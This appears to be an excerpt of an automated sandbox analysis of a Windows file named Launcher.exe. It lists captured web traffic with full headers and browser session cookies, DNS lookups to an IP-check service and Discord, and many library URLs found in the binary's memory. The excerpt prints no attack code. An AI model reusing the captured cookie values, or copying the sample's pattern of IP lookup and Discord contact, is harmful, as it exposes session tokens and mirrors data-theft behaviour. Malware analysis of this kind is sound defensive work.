          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=t5eQhsGimpG9zPOBOY2wNuUSds5MTjTBTyzQvp4ySWOnbLuVtRHoO1DViiNP058iSljBf2ncD3sQVsbuqq41WRPyqsiYslE4k_NGEx-qD8JZbOl4SoCoxlFzZtKOWgVWCBrvRFSLJumayaOUlgmwh7O6fw4RXdv0jc1TtQkS3cNwA5AIm3J8SiySo_YQH5B5
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=15&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=ZeOmRYkPNiCmCTvJoSDlru-1qE2XbLsR_rgjD_YjGyk-Y-Bd0gtv60C77LU2ad665oPcXdCbiPwmn1UlLwwa1wBmKoZsYbK1afbLjx18Z0Wh7nOy9MhWPAoAPITFMNBmKLe29a6MIg5n5mOMiH6vQSjCW9VYO1y4wJQR2omcSedQPHs7v1aAUWe9Sh7ab-YjGVfKOYco
          Source: global trafficHTTP traffic detected: GET /widget/app/so?eom=1&awwd=1&origin=chrome-untrusted%3A%2F%2Fnew-tab-page&origin=chrome%3A%2F%2Fnew-tab-page&cn=app&pid=1&spid=243&hl=en HTTP/1.1Host: ogs.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=ZeOmRYkPNiCmCTvJoSDlru-1qE2XbLsR_rgjD_YjGyk-Y-Bd0gtv60C77LU2ad665oPcXdCbiPwmn1UlLwwa1wBmKoZsYbK1afbLjx18Z0Wh7nOy9MhWPAoAPITFMNBmKLe29a6MIg5n5mOMiH6vQSjCW9VYO1y4wJQR2omcSedQPHs7v1aAUWe9Sh7ab-YjGVfKOYco
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?09fe28e030bfb3d2700250f615c0d14c HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: rum8.perf.linkedin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?69fe28e7ed93181f342ff6c07584be82 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: rum8.perf.linkedin.comConnection: Keep-AliveCookie: bcookie="v=2&187d17e4-bbec-407f-8211-1f1bf02a399c"
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: apis.google.com
          Source: global trafficDNS traffic detected: DNS query: play.google.com
          Source: global trafficDNS traffic detected: DNS query: ogs.google.com
          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
          Source: global trafficDNS traffic detected: DNS query: tools.google.com
          Source: global trafficDNS traffic detected: DNS query: canary.discord.com
          Source: global trafficDNS traffic detected: DNS query: discord.com
          Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 898sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded;charset=UTF-8sec-ch-ua-mobile: ?0Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://allyoucanleet.com/)
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me)
          Source: Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1183107459.00000174E0558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/)
          Source: Launcher.exe, 00000000.00000003.1251349025.000000A8F3201000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/):
          Source: Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1136559709.00000174E050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/post/59142742143/designing-apis-for-asynchrony)
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0589000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://christalkington.com/
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://christalkington.com/new
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
          Source: Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1135628118.00000174E0460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://connalle.blogspot.com/2013/10/topological-sortingkahn-algorithm.html
          Source: Launcher.exe, 00000000.00000003.1409183771.00000174E067B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E06AD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183610.0000011823C41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E0697000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428062025.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1414356089.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crestidg.com)
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1121188278.00000174E05F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://debuggable.com/)
          Source: Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://digitalbazaar.com/
          Source: Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-object.keys)
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1196985642.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0930000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0940000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1182279794.00000174E08F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-object.prototype.tostring)
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1156398710.00000174E054B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08BD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-patterns).
          Source: Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-samevaluezero)
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155551672.00000174E0554000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0930000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08C4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08BD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-tolength).
          Source: Launcher.exe, 00000000.00000003.1444280656.00000174E0454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evanjones.ca/)
          Source: Launcher.exe, 00000000.00000003.1273794099.000003DB1B601000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://feross.org
          Source: Launcher.exe, 00000000.00000003.1281337030.00000174E40EC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280399544.000001F349E11000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://github.com/tryghost/node-sqlite3
          Source: Launcher.exe, 00000000.00000003.1139296292.00000174E0434000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1135628118.00000174E0440000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0530000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1139296292.00000174E0440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://juliangruber.com
          Source: Launcher.exe, 00000000.00000003.1409183771.00000174E067B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E06AD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183610.0000011823C41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E0697000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428062025.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1414356089.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kevin.vanzonneveld.net
          Source: Launcher.exe, 00000000.00000003.1409183771.00000174E067B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E06AD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183610.0000011823C41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E0697000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428062025.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1414356089.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kevin.vanzonneveld.net)
          Source: Launcher.exe, 00000000.00000003.1210752491.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1149072420.00000174E0639000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1220923642.00000174E0880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://n8.io/)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nodejs.org/).
          Source: Launcher.exe, 00000000.00000003.1180379538.00000174E0A49000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191818453.00000174E0A4A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1161013402.00000174E0A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sheetjs.com
          Source: Launcher.exe, 00000000.00000003.1409183771.00000174E067B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E06AD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183610.0000011823C41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E0697000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428062025.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1414356089.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://snipplr.com/view/5945/javascript-numberformat--ported-from-php/
          Source: Launcher.exe, 00000000.00000003.1409183771.00000174E067B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1417967689.00000174E0378000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E06AD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183610.0000011823C41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E0697000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428062025.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1414356089.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://snipplr.com/view/5949/format-humanize-file-byte-size-presentation-in-javascript/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
          Source: Launcher.exe, 00000000.00000003.1409183771.00000174E067B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E06AD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183610.0000011823C41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E0697000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428062025.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1414356089.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/679915/how-do-i-test-for-an-empty-javascript-object-from-json/679
          Source: Launcher.exe, 00000000.00000003.1183107459.00000174E05BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://substack.net
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E0635000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tootallnate.net)
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1196985642.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0930000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1156398710.00000174E054B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08BD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0656000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0940000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1182279794.00000174E08F6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150933749.00000174E0857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://underscorejs.org/LICENSE
          Source: Launcher.exe, 00000000.00000003.1118712238.00000174E043A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://url.spec.whatwg.org/#urlutils
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
          Source: Launcher.exe, 00000000.00000003.1320953728.00000174E195E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1342161238.00000174E07AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/web/20140401031018/http://rjpower9000.wordpress.com:80/2012/04/09/fun-with-sh
          Source: Launcher.exe, 00000000.00000003.1444280656.00000174E0454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://webrsa.cvs.sourceforge.net/viewvc/webrsa/Client/RSAES-OAEP.js?content-type=text%2Fplain:
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1136559709.00000174E050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-8.6)
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1153958014.00000174E04CC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155551672.00000174E0554000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0930000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08C4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08BD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/ecma-262/7.0/#sec-ecmascript-language-types)
          Source: Launcher.exe, 00000000.00000003.1117959570.00000174E0582000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1118712238.00000174E043A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com)
          Source: Launcher.exe, 00000000.00000003.1414356089.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jsfromhell.com)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
          Source: Launcher.exe, 00000000.00000003.1409183610.0000011823C41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1417967689.00000174E03FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1415719735.00000174E0520000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org
          Source: Launcher.exe, 00000000.00000003.1442068045.00000174E0524000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1442068045.00000174E0500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/docs/crypto/EVP_BytesToKey.html
          Source: Launcher.exe, 00000000.00000003.1444280656.00000174E0454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rsa.com/rsalabs/node.asp?id=2125
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
          Source: Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.syskall.com)
          Source: Launcher.exe, 00000000.00000003.1409183771.00000174E067B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E06AD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183610.0000011823C41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1409183771.00000174E0697000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428062025.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1414356089.00000174E0854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.winternet.no)
          Source: Launcher.exe, 00000000.00000003.1122482358.00000174E0418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3.svg?type=la
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3.svg?type=sh
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3?ref=badge_large
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3?ref=badge_shiel
